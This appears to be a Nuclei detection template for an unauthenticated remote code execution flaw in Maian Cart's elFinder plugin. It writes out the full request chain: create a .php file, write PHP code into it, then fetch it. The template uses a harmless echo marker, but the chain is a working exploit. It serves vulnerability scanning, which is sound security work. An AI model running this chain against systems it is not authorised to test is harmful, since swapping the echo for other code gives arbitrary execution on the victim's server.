2021-05-24 23:38:52 +00:00
id : maian-cart-preauth-rce
info :
name : Maian Cart 3.8 preauth RCE
author : pdteam
severity : critical
description : A severe vulnerability has been kindly reported to me by security advisor DreyAnd. The issue concerns the elFinder file manager plugin in Maian Cart and it affects all versions from 3.0 to 3.8.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://dreyand.github.io/maian-cart-rce/
- https://github.com/DreyAnd/maian-cart-rce
- https://www.maianscriptworld.co.uk/critical-updates
2021-05-24 23:38:52 +00:00
tags : rce,unauth,maian
requests :
- raw :
- |
GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1
Host : {{Hostname}}
Accept : */*
- |
POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1
Host : {{Hostname}}
Accept : application/json, text/javascript, /; q=0.01
Accept-Language : en-US,en;q=0.5
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e
- |
GET /product-downloads/{{randstr}}.php HTTP/1.1
Host : {{Hostname}}
Accept : */*
extractors :
- type : regex
name : hash
internal : true
group : 1
regex :
- '"hash"\:"(.*?)"\,'
req-condition : true
matchers :
- type : dsl
dsl :
2021-06-13 06:53:47 +00:00
- 'contains(body_3, "{{randstr_1}}")'
2021-06-26 14:05:52 +00:00
- "status_code_3 == 200"
condition : and